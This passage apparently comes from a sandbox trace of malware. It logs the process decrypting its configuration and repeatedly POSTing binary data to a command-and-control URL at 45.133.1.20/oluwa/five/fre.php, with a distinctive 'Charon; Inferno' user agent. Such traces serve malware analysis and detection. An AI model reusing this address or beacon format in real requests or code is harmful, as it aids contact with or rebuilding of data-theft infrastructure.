pbData=0x418960, dwFlags=0x0) returned 1 [0209.566] GetProcessHeap () returned 0x6a0000 [0209.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0209.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.568] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0209.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.569] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0209.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.571] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0209.575] GetProcessHeap () returned 0x6a0000 [0209.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.576] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0209.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.578] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0209.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.579] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0209.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.581] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0209.581] GetProcessHeap () returned 0x6a0000 [0209.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0209.581] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0209.582] GetProcessHeap () returned 0x6a0000 [0209.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0209.582] socket (af=2, type=1, protocol=6) returned 0x5ac [0209.582] connect (s=0x5ac, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0209.605] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0209.605] GetProcessHeap () returned 0x6a0000 [0209.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0209.605] GetProcessHeap () returned 0x6a0000 [0209.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0209.606] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.606] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.606] GetProcessHeap () returned 0x6a0000 [0209.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0209.606] GetProcessHeap () returned 0x6a0000 [0209.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.607] GetProcessHeap () returned 0x6a0000 [0209.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0209.607] GetProcessHeap () returned 0x6a0000 [0209.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0209.608] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.609] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.609] GetProcessHeap () returned 0x6a0000 [0209.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0209.609] GetProcessHeap () returned 0x6a0000 [0209.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.609] send (s=0x5ac, buf=0x6bd460*, len=242, flags=0) returned 242 [0209.611] send (s=0x5ac, buf=0x6bb998*, len=159, flags=0) returned 159 [0209.611] GetProcessHeap () returned 0x6a0000 [0209.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0209.611] recv (in: s=0x5ac, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0209.673] GetProcessHeap () returned 0x6a0000 [0209.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0209.674] GetProcessHeap () returned 0x6a0000 [0209.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0209.675] GetProcessHeap () returned 0x6a0000 [0209.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0209.676] GetProcessHeap () returned 0x6a0000 [0209.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0209.676] closesocket (s=0x5ac) returned 0 [0209.677] GetProcessHeap () returned 0x6a0000 [0209.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0209.678] GetProcessHeap () returned 0x6a0000 [0209.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.679] GetProcessHeap () returned 0x6a0000 [0209.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0209.679] GetProcessHeap () returned 0x6a0000 [0209.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0209.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7f4) returned 0x5ac [0209.685] Sleep (dwMilliseconds=0xea60) [0209.686] GetProcessHeap () returned 0x6a0000 [0209.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0209.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.688] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.696] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0209.705] GetProcessHeap () returned 0x6a0000 [0209.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0209.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.706] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0209.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.716] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.717] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.717] GetProcessHeap () returned 0x6a0000 [0209.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0209.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.719] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0209.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.720] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0209.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.721] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0209.721] GetProcessHeap () returned 0x6a0000 [0209.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.722] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.723] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.724] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.724] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.725] GetProcessHeap () returned 0x6a0000 [0209.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0209.725] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.725] GetProcessHeap () returned 0x6a0000 [0209.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0209.725] GetProcessHeap () returned 0x6a0000 [0209.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.726] GetProcessHeap () returned 0x6a0000 [0209.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0209.726] GetProcessHeap () returned 0x6a0000 [0209.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0209.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.727] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.733] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0209.739] GetProcessHeap () returned 0x6a0000 [0209.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0209.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.740] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0209.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.741] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.742] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.742] GetProcessHeap () returned 0x6a0000 [0209.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0209.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.744] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0209.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.745] CryptDestroyKey (hKey=0x6ad060) returned 1 [0209.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.746] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0209.746] GetProcessHeap () returned 0x6a0000 [0209.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.747] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0209.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.748] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0209.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.749] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0209.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.751] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0209.751] GetProcessHeap () returned 0x6a0000 [0209.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0209.751] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0209.751] GetProcessHeap () returned 0x6a0000 [0209.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0209.751] socket (af=2, type=1, protocol=6) returned 0x5b0 [0209.752] connect (s=0x5b0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0209.781] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0209.781] GetProcessHeap () returned 0x6a0000 [0209.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0209.781] GetProcessHeap () returned 0x6a0000 [0209.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0209.783] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.784] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.784] GetProcessHeap () returned 0x6a0000 [0209.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0209.785] GetProcessHeap () returned 0x6a0000 [0209.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.785] GetProcessHeap () returned 0x6a0000 [0209.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0209.785] GetProcessHeap () returned 0x6a0000 [0209.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0209.786] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.787] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.787] GetProcessHeap () returned 0x6a0000 [0209.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0209.787] GetProcessHeap () returned 0x6a0000 [0209.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.787] send (s=0x5b0, buf=0x6bd460*, len=242, flags=0) returned 242 [0209.788] send (s=0x5b0, buf=0x6bb998*, len=159, flags=0) returned 159 [0209.788] GetProcessHeap () returned 0x6a0000 [0209.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0209.788] recv (in: s=0x5b0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0209.863] GetProcessHeap () returned 0x6a0000 [0209.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0209.864] GetProcessHeap () returned 0x6a0000 [0209.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0209.864] GetProcessHeap () returned 0x6a0000 [0209.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0209.865] GetProcessHeap () returned 0x6a0000 [0209.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0209.865] closesocket (s=0x5b0) returned 0 [0209.866] GetProcessHeap () returned 0x6a0000 [0209.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0209.867] GetProcessHeap () returned 0x6a0000 [0209.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.867] GetProcessHeap () returned 0x6a0000 [0209.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0209.868] GetProcessHeap () returned 0x6a0000 [0209.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0209.868] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe70) returned 0x5b0 [0209.870] Sleep (dwMilliseconds=0xea60) [0209.871] GetProcessHeap () returned 0x6a0000 [0209.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0209.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.872] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.878] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0209.885] GetProcessHeap () returned 0x6a0000 [0209.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0209.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.886] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0209.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.887] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.888] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.888] GetProcessHeap () returned 0x6a0000 [0209.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0209.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.890] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0209.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.891] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0209.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.892] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0209.892] GetProcessHeap () returned 0x6a0000 [0209.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.893] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.894] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.895] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.896] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.896] GetProcessHeap () returned 0x6a0000 [0209.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0209.896] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.896] GetProcessHeap () returned 0x6a0000 [0209.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0209.897] GetProcessHeap () returned 0x6a0000 [0209.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.900] GetProcessHeap () returned 0x6a0000 [0209.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0209.900] GetProcessHeap () returned 0x6a0000 [0209.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0209.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.901] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.907] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0209.913] GetProcessHeap () returned 0x6a0000 [0209.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0209.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.914] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0209.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.916] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.917] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.917] GetProcessHeap () returned 0x6a0000 [0209.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0209.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.919] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0209.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.920] CryptDestroyKey (hKey=0x6ad020) returned 1 [0209.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.921] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0209.921] GetProcessHeap () returned 0x6a0000 [0209.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 